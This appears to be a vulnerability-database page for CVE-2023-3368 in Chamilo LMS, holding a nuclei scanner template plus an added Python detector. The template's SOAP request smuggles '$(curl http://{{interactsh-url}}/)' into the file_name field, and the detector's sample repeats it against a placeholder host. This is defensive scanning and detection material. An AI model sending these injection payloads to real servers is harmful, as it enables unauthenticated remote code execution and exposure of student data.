Chamilo LMS <= v1.11.20 Unauthenticated Command Injection

Published 02 Jul 2026 09:36:57 · Reported by ProjectDiscovery · Type: nuclei · Source: github.com · 336 views

A command injection in Chamilo LMS v1.11.20 allows unauthenticated attackers to obtain remote code execution via improper neutralisation of special characters.

Related

Reporter | Title | Published | Family
Circl | CVE-2023-3368 | 17 Dec 2023 14:43 | circl
CNNVD | Chamilo LMS Security Vulnerability | 28 Nov 2023 00:00 | cnnvd
CVE | CVE-2023-3368 | 28 Nov 2023 07:05 | cve
Cvelist | CVE-2023-3368 Chamilo LMS Unauthenticated Command Injection | 28 Nov 2023 07:05 | cvelist
NVD | CVE-2023-3368 | 28 Nov 2023 07:15 | nvd
OpenVAS | Chamilo LMS 1.11.x < 1.11.22 Multiple Vulnerabilities | 1 Dec 2023 00:00 | openvas
OSV | CVE-2023-3368 | 28 Nov 2023 07:15 | osv
Prion | Command injection | 28 Nov 2023 07:15 | prion
Positive Technologies | PT-2023-24446 · Unknown · Chamilo Lms | 28 Nov 2023 00:00 | ptsecurity
RedhatCVE | CVE-2023-3368 | 23 May 2025 03:53 | redhatcve

Code
id: CVE-2023-3368

info:
  name: Chamilo LMS <= v1.11.20 Unauthenticated Command Injection
  author: dwisiswant0
  severity: critical
  description: |
    Command injection in `/main/webservices/additional_webservices.php`
    in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain
    remote code execution via improper neutralisation of special characters.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands through the wsConvertPpt SOAP endpoint by injecting special characters in the file_name parameter, potentially compromising the entire Chamilo LMS platform and accessing student data.
  remediation: |
    Update Chamilo LMS to a version newer than 1.11.20 that properly neutralizes special characters and validates input in additional_webservices.php.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3368
    - https://starlabs.sg/advisories/23/23-3368/
    - https://support.chamilo.org/projects/chamilo-18/wiki/security_issues#Issue-121-2023-07-05-Critical-impact-High-risk-Unauthenticated-Command-Injection-CVE-2023-3368
    - https://github.com/chamilo/chamilo-lms/commit/37be9ce7243a30259047dd4517c48ff8b21d657a
    - https://github.com/chamilo/chamilo-lms/commit/4c69b294f927db62092e01b70ac9bd6e32d5b48b
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3368
    cwe-id: CWE-78
    epss-score: 0.68897
    epss-percentile: 0.99263
    cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: chamilo
    product: chamilo
    shodan-query:
      - http.component:"Chamilo"
      - http.component:"chamilo"
      - cpe:"cpe:2.3:a:chamilo:chamilo"
  tags: cve2023,cve,chamilo,unauth,cmd,rce,vkev,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/main/webservices/additional_webservices.php"

    headers:
      Content-Type: application/xml

    body: |
      <?xml version="1.0" encoding="UTF-8"?>
      <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{BaseURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <SOAP-ENV:Body>
          <ns1:wsConvertPpt>
            <param0 xsi:type="ns2:Map">
              <item>
                <key xsi:type="xsd:string">file_data</key>
                <value xsi:type="xsd:string"></value>
              </item>
              <item>
                <key xsi:type="xsd:string">file_name</key>
                <value xsi:type="xsd:string">$(curl http://{{interactsh-url}}/)</value>
              </item>
              <item>
                <key xsi:type="xsd:string">service_ppt2lp_size</key>
                <value xsi:type="xsd:string">720x540</value>
              </item>
            </param0>
          </ns1:wsConvertPpt>
        </SOAP-ENV:Body>
      </SOAP-ENV:Envelope>

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "wsConvertPptResponse"
        part: body

      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022031fdee831e1a7a531db1508b21fe3f7c483523659a68812475ae4a2d8708d6db022100b39ef1fbf03f2f7c58c606ace5953c31317e6f7cd5fa347c5bab968a02c0b364:922c64590222798bb761d5b6d8e72950
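As an added detection-side example (not part of the nuclei template or of the Chamilo project), the following Python check parses captured request bodies in the shape the template above sends and flags a wsConvertPpt call whose file_name contains shell metacharacters; the host lms.example.test, the oob.example.test callback and both request bodies are constructed for illustration.

```python
"""Flag wsConvertPpt SOAP requests whose file_name carries shell metacharacters.
Added detection example, not the nuclei template's or Chamilo's own code; assumes
you capture raw POST bodies to /main/webservices/additional_webservices.php (WAF,
reverse proxy, pcap). The two request bodies below are constructed samples."""
import re
import xml.etree.ElementTree as ET

SOAP_ENV = "{http://schemas.xmlsoap.org/soap/envelope/}"
# Characters that let a parameter escape a shell command line (CWE-78); a
# legitimate upload name rarely needs any of them.
SHELL_META = re.compile(r"[;&|`$<>\n\r]")

def map_params(root):
    """Collect key/value pairs of the ns2:Map <item> elements (param0)."""
    params = {}
    for item in root.iter("item"):
        key, value = item.find("key"), item.find("value")
        if key is not None and key.text:
            params[key.text] = "" if value is None else (value.text or "")
    return params

def inspect_request(body: str):
    """Return a finding for a wsConvertPpt call with a suspicious file_name, else None."""
    try:
        root = ET.fromstring(body.encode("utf-8"))
    except ET.ParseError:
        return None  # not XML at all: not this rule's concern
    soap_body = root.find(SOAP_ENV + "Body")
    if soap_body is None or not any(c.tag.endswith("}wsConvertPpt") for c in soap_body):
        return None
    name = map_params(root).get("file_name", "")
    if SHELL_META.search(name):
        return {"rule": "CVE-2023-3368 wsConvertPpt file_name injection", "file_name": name}
    return None

def sample_request(file_name: str) -> str:
    """Constructed envelope in the shape the template sends (ns1 is the site's base URL)."""
    return (
        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
        'xmlns:ns1="http://lms.example.test" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
        'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap">'
        '<SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map">'
        '<item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item>'
        f'<item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">{file_name}</value></item>'
        '<item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item>'
        "</param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>"
    )

BENIGN = sample_request("week3-slides.ppt")
MALICIOUS = sample_request("$(curl http://oob.example.test/)")
```

Pair a hit from inspect_request with the template's own signal (an outbound request from the LMS host right after the POST) to confirm exploitation rather than a probe.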

Scores (current as of 04 Feb 2026 07:00)
Vulners AI Score: 7.7 (High risk)
CVSS 3.1: 9.8
EPSS: 0.68897
Views: 336